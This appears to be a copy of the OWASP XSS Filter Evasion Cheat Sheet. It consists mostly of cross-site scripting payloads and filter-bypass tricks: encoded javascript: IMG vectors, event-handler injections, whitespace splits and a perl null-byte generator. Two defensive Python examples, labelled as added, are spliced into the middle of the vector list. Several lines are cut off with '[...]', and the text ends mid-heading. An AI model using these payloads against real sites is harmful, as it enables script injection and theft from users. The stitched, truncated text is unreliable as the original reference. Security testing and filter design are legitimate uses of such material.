That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention Cheat Sheet, the XSS (Cross Site Scripting) Prevention Cheat Sheet, was inspired by RSnake's XSS Cheat Sheet, so we can thank him for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in a rather complex attack cheat sheet, and so the OWASP Cheat Sheet Series was born.

Tests

This cheat sheet is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. Please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the scripts.

XSS Locator

Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often injecting the deprecated <PLAINTEXT> tag will be enough to check whether something is vulnerable to XSS, because it messes up the output appreciably.

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS Locator (short)

If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.

'';!--"<XSS>=&{()}

No Filter Evasion

This is a normal XSS JavaScript injection, and most likely to get caught, but I suggest trying it first (the quotes are not required in any modern browser, so they are omitted here):

<SCRIPT SRC=http://xss.[truncated in source]></SCRIPT>
Filter bypass based polyglot

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> [...] XSS [...] type=submit> [...] </script>

Image XSS using the JavaScript directive

Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in the context of an image, but it does in other contexts; the following shows the principles that would work in other tags as well):

<IMG SRC="javascript:alert('XSS');">

No quotes and no semicolon

<IMG SRC=javascript:alert('XSS')>

Case insensitive XSS attack vector

<IMG SRC=JaVaScRiPt:alert('XSS')>

HTML entities

The semicolons are required for this to work:

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

Grave accent obfuscation

If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string. This is also useful because lots of cross site scripting filters don't know about grave accents:

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed A tags

Skip the HREF attribute and get to the meat of the XSS. Submitted by David Cross. Verified on Chrome. Chrome loves to replace missing quotes for you: Chrome will put them in the right place and fix your missing quotes on a URL or script.

Malformed IMG tags

Originally found by Begeek but cleaned up and shortened to work in all browsers, this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Default SRC tag to get past filters that check SRC domain

This will bypass most SRC domain filters.
Inserting JavaScript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted, like onblur or onclick, giving you an extensive number of variations for many of the injections listed here. Submitted by David Cross. Edited by Abdullah Hussam (Abdulahhusam).

<IMG SRC=# onmouseover="alert('xxs')">

Default SRC tag by leaving it empty

<IMG SRC= onmouseover="alert('xxs')">

Default SRC tag by leaving it out entirely

<IMG onmouseover="alert('xxs')">

On error alert

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror and javascript alert encode

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Decimal HTML character references

All of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8 in Gecko rendering engine mode.

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Decimal HTML character references without trailing semicolons

This is often effective in XSS that attempts to look for &#XX;, since most people don't know about padding up to 7 numeric characters total. This is also useful against people who decode against strings like $tmp_string =~ s[...] (I've seen this in the wild).

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Hexadecimal HTML character references without trailing semicolons

This is also a viable XSS attack against the above string $tmp_string =~ s[...], since that pattern expects decimal digits after the pound symbol, which is not true of hex HTML characters.

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Embedded tab

Used to break up the cross site scripting attack (there is a literal tab character between "jav" and "ascript"):

<IMG SRC="jav	ascript:alert('XSS');">

Embedded encoded tab

Use this one to break up XSS:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded newline to break up XSS

Some websites claim that any of the characters 09 through 13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following four XSS examples illustrate this vector:

<IMG SRC="jav&#x0A;ascript:alert('XSS');">
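The character-reference and embedded-whitespace vectors above all rely on a filter inspecting the attribute value before the browser has decoded it. The following is an added example, not code from the OWASP cheat sheet or its authors: it canonicalises an attribute value the way a browser does (decimal or hex references, with or without the trailing semicolon, with any zero padding; tab, newline, carriage return and null inside the scheme discarded) and compares that with a filter of the naive kind the text describes, which decodes only semicolon-terminated decimal references. All function names and the sample strings are this example's own constructions, modelled on the vectors on this page.

```python
"""Added example (not from the OWASP cheat sheet): canonicalise an attribute
value before checking it for the javascript: scheme, and show which of the
page's encoding variants a naive filter misses."""
import re

# A numeric character reference. The trailing ';' is optional and the digit
# run is unbounded, because browsers consume every digit they find.
_CHAR_REF = re.compile(r"&#(?:[xX]([0-9A-Fa-f]+)|([0-9]+));?")

# Characters the URL parser drops from a scheme (tab, LF, CR) plus NUL, which
# older engines ignored; dropping NUL here errs on the side of detection.
_SCHEME_NOISE = "\t\n\r\x00"

# Constructed inputs modelled on the vectors on this page.
SAMPLES = {
    "plain":            "javascript:alert('XSS')",
    "mixed_case":       "JaVaScRiPt:alert('XSS')",
    "decimal":          "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;"
                        "&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
    "decimal_padded":   "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114"
                        "&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101"
                        "&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083"
                        "&#0000039&#0000041",
    "hex_no_semicolon": "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61"
                        "&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
    "encoded_tab":      "jav&#x09;ascript:alert('XSS')",
    "encoded_newline":  "jav&#x0A;ascript:alert('XSS')",
    "encoded_cr":       "jav&#x0D;ascript:alert('XSS')",
    "raw_null":         "java\x00script:alert('XSS')",
    "benign":           "https://example.org/logo.png",
}


def decode_char_refs(value: str) -> str:
    """Decode numeric character references; out-of-range code points become U+FFFD."""
    def _sub(m: re.Match) -> str:
        cp = int(m.group(1), 16) if m.group(1) is not None else int(m.group(2))
        try:
            return chr(cp)
        except (ValueError, OverflowError):  # e.g. &#99999999999999999999;
            return "\ufffd"
    return _CHAR_REF.sub(_sub, value)


def canonical_scheme(value: str) -> str:
    """The URL scheme a browser would resolve for an attribute value, or ''."""
    cleaned = "".join(ch for ch in decode_char_refs(value) if ch not in _SCHEME_NOISE)
    cleaned = cleaned.lstrip()
    scheme, sep, _ = cleaned.partition(":")
    # RFC 3986 scheme syntax; anything else is a relative URL, not a scheme.
    if not sep or not re.fullmatch(r"[A-Za-z][A-Za-z0-9+.-]*", scheme):
        return ""
    return scheme.lower()


def is_script_url(value: str) -> bool:
    """True when the value resolves to the javascript: scheme."""
    return canonical_scheme(value) == "javascript"


def naive_filter_blocks(value: str) -> bool:
    """The filter the text warns about: decodes only '&#ddd;' and then looks
    for the literal 'javascript:'."""
    decoded = re.sub(r"&#(\d+);", lambda m: chr(int(m.group(1))), value)
    return "javascript:" in decoded.lower()


def audit() -> dict:
    """Per sample: (naive filter blocks it?, canonical check flags it?)."""
    return {name: (naive_filter_blocks(v), is_script_url(v)) for name, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (naive, canon) in audit().items():
        print(f"{name:17s} naive={naive!s:5s} canonical={canon}")
```

Run stand-alone, the table shows the naive filter catching only the plain, mixed-case and semicolon-terminated decimal samples, while the canonical check flags every sample except the benign URL. The design point is that a deny-list check is only meaningful after the same decoding the browser performs; the page's padded, unterminated and whitespace-split variants are all the same string once canonicalised.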
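The quote, grave accent and unquoted-attribute vectors earlier on this page work because a filter that escapes only the characters it expects leaves the rest alone. As an added example, not code from the OWASP cheat sheet or its authors, the block below implements attribute-context encoding in the style OWASP recommends for output (every non-alphanumeric ASCII character becomes a numeric character reference) and contrasts it with Python's html.escape(), which leaves the grave accent and the colon of the javascript: scheme untouched. Function names and sample strings are this example's own.

```python
"""Added example (not from the OWASP cheat sheet): attribute-context output
encoding versus a quote-only escaper, on inputs modelled on this page's
grave-accent, quote and broken-attribute vectors."""
import html

# Constructed sample inputs modelled on the vectors above.
SAMPLES = [
    "javascript:alert('XSS')",
    '`javascript:alert("RSnake says, \'XSS\'")`',
    '"><SCRIPT>alert("XSS")</SCRIPT>"',
]


def encode_for_html_attribute(value: str) -> str:
    """Encode untrusted data for insertion into a quoted HTML attribute.

    Every character other than ASCII letters and digits is replaced by its
    hexadecimal numeric character reference (&#xHH;), so quotes, backticks,
    '<', '>', ':' and whitespace can never terminate the attribute or change
    how its value is parsed."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        else:
            out.append("&#x%X;" % ord(ch))
    return "".join(out)


def leaks_attribute_breakers(encoded: str) -> bool:
    """True if any character that can break out of, or be mis-parsed inside,
    an attribute value survived encoding."""
    return any(c in encoded for c in "\"'`<>:")


def render_img_alt(untrusted: str) -> str:
    """Hypothetical template code: an <img> whose alt attribute carries
    untrusted data through the encoder above."""
    return '<img src="/static/logo.png" alt="%s">' % encode_for_html_attribute(untrusted)


def compare(value: str) -> dict:
    """Show how html.escape() and attribute encoding differ on one input."""
    escaped = html.escape(value, quote=True)
    encoded = encode_for_html_attribute(value)
    return {
        "html_escape_leaves_backtick": "`" in escaped,
        "html_escape_leaves_colon": ":" in escaped,
        "attribute_encoding_leaks": leaks_attribute_breakers(encoded),
    }


if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s))
        print("  html.escape:", html.escape(s, quote=True))
        print("  attribute  :", encode_for_html_attribute(s))
        print("  ", compare(s))
```

html.escape() is adequate for text-node context, where only '<', '>' and '&' matter; the grave accent only becomes a delimiter in attribute context, which is exactly where the vectors above place it, so the encoder used has to match the context the data lands in.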
Embedded carriage return to break up XSS

(Note: with the above I am making these strings longer than they have to be, because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1 to 7 characters.)

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null breaks up JavaScript directive

Null chars also work as XSS vectors, but not like above: you need to inject them directly using something like Burp Proxy, or use %00 in the URL string, or, if you want to write your own injection tool, you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.[...] on Windows) were vulnerable to one additional char, 1[...]. But the null char %00 [...]

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Spaces and meta chars before the JavaScript